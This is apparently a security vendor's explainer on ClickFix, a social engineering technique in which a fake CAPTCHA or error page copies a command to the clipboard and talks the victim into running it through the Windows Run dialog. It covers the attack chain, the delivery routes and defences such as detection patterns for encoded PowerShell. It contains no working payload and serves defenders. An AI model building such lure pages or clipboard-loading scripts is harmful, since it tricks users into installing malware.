What is ClickFix?

What it is#

ClickFix is a social engineering technique that tricks users into manually executing malicious commands on their own machines. Rather than delivering malware through a file attachment or exploit kit, the attacker presents a fake error message, CAPTCHA verification, or troubleshooting dialog that instructs the user to open the Windows Run dialog (Win+R) or a terminal, then paste content from the clipboard, content the attacker has silently populated using JavaScript.

The technique gained prominence in 2024 and has since appeared across multiple threat actor campaigns, from commodity malware delivery to state-sponsored operations. ClickFix is closely related to phishing in its reliance on deception, but it shifts the execution burden entirely onto the victim.

How a ClickFix attack works#

A typical attack chain:

1. The victim lands on a malicious or compromised webpage, often through a phishing link, malvertising redirect, or SEO poisoning
2. The page displays a convincing overlay (a fake Google reCAPTCHA, a browser update prompt, or an error message stating "Verification required" or "Fix this issue")
3. JavaScript on the page silently copies a malicious command to the clipboard using the Clipboard API (navigator.clipboard.writeText())
4. The instructions tell the user to press Win+R (opening the Run dialog), then Ctrl+V and Enter
5. The pasted command, typically a PowerShell one-liner or mshta invocation, downloads and executes a payload

The user action chain is critical. The victim believes they are completing a routine verification step. The commands are often obfuscated or shortened so they look like a harmless verification code rather than executable instructions.

Why it evades traditional security#

ClickFix is effective because the malicious execution happens entirely through user action on the local machine. Email security gateways scan attachments and URLs but cannot prevent a user from pasting a command into a system dialog. Web content filters may block the initial landing page, but they do not control the clipboard or local execution environment.

Sandboxing and browser isolation also have limited visibility here. The payload is not downloaded through the browser, the user manually invokes a system-level command that reaches out to attacker infrastructure from outside the browser context.

Delivery mechanisms#

• Phishing emails linking to fake document viewers or collaboration portals
• Compromised legitimate websites injected with ClickFix overlay scripts
• Malvertising through ad networks that redirect to ClickFix landing pages
• Fake software update pages impersonating Chrome, Windows Defender, or enterprise tools

The landing pages frequently rely on lookalike domains and typosquatting to host convincing impersonations of well-known services. Attackers register domains that closely mimic legitimate update portals or verification pages, leveraging brand impersonation to build trust before presenting the fake verification step.

Detection and prevention#

• Endpoint detection. Monitor for processes spawned by cmd.exe or powershell.exe immediately after Win+R usage, especially with encoded commands or network-fetching behaviors
• Clipboard monitoring policies. Some endpoint protection platforms can alert on clipboard content containing PowerShell or script execution patterns
• User awareness training. Teach users that legitimate CAPTCHAs and error messages never ask them to open a Run dialog or paste commands
• Web filtering. Block known ClickFix infrastructure and detect the JavaScript patterns used to populate the clipboard
• PowerShell execution policies. Constrained language mode or application allowlisting can limit what pasted commands can accomplish